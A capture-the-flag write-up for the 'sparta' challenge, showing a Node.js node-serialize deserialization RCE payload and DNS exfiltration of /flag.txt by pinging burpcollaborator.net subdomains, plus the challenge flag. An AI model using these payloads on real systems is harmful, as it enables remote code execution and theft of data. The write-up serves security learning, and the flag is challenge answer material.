sparta
by shreyas-sriram
Spartanians are starting to lose their great power, help them move their objects and rebuild their Empire.
Solution
- On reviewing the source code, the line
var obj = serialize.unserialize(str);seems suspicious - A quick online search leads to a known exploit
- Following the PoC from the article, the following payload is constructed
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('<command>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
- Replace
<command>with a suitable command to extract the flag out-of-band - The below payload uses DNS to extract the flag
// to find the total characters in /flag.txt
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ping $(wc -c < /flag.txt).ih36jzqfsq2dsbdhg56qmz6z3q9hx6.burpcollaborator.net', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
// extract only the part of the flag between the curly braces
// zh3r0{<extract this>}
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ping $(cat /flag.txt | cut -c7-52).9lvmt3fkdemz1xshrjzcac4njep4dt.burpcollaborator.net', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
Alternate solutions : Using
curl.
Flag
zh3r0{4ll_y0u_h4d_t0_d0_w4s_m0v3_th3_0bjc3ts_3mper0r}